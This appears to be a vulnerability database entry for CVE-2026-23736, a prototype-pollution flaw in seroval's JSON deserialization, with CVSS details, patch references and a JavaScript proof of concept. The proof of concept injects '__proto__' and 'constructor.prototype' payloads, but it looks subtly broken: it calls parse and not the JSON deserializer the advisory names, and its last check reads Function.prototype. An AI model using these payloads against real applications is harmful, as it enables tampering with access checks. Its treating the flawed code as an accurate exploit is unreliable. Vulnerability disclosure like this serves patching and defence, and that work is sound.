Security Vulnerability Report
CVE-2026-23736 CVSS 7.3 HIGH

CVE-2026-23736

Published: 2026-01-21 23:15:52
Last Modified: 2026-02-27 19:36:51

Description

seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, due to improper input validation, a malicious object key can lead to prototype pollution during JSON deserialization. This vulnerability affects only JSON deserialization functionality. This issue is fixed in version 1.4.1.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L (secondary metric; exploitability 3.9, impact 3.4)
Primary metric: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, score 9.8 CRITICAL (exploitability 3.9, impact 5.9)
Weakness: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, "Prototype Pollution")

Configurations (Affected Products)

cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:* - VULNERABLE
seroval <= 1.4.0 (all versions before 1.4.1; fixed in 1.4.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
import { parse } from 'seroval';

// Malicious JSON payload that triggers prototype pollution
const maliciousPayload = JSON.stringify({
  "__proto__": {
    "isAdmin": true,
    "polluted": "prototype pollution successful"
  }
});

try {
  // Parse the malicious JSON - this triggers prototype pollution
  const result = parse(maliciousPayload);
  console.log('Parsed result:', result);

  // Verify prototype pollution
  console.log('Pollution check:', Object.prototype.polluted);

  // Check if any plain object is affected
  const testObj = {};
  console.log('Test object polluted:', testObj.polluted);
  console.log('Test object isAdmin:', testObj.isAdmin);
} catch (e) {
  console.error('Parse error:', e.message);
}

// Another exploitation vector with constructor pollution
const constructorPayload = JSON.stringify({
  "constructor": {
    "prototype": {
      "exec": "malicious_code"
    }
  }
});
const result2 = parse(constructorPayload);
console.log('Constructor pollution:', Object.constructor.prototype.exec);
```

References

Patch: https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060
Vendor Advisory: https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hj76-42vx-jwp4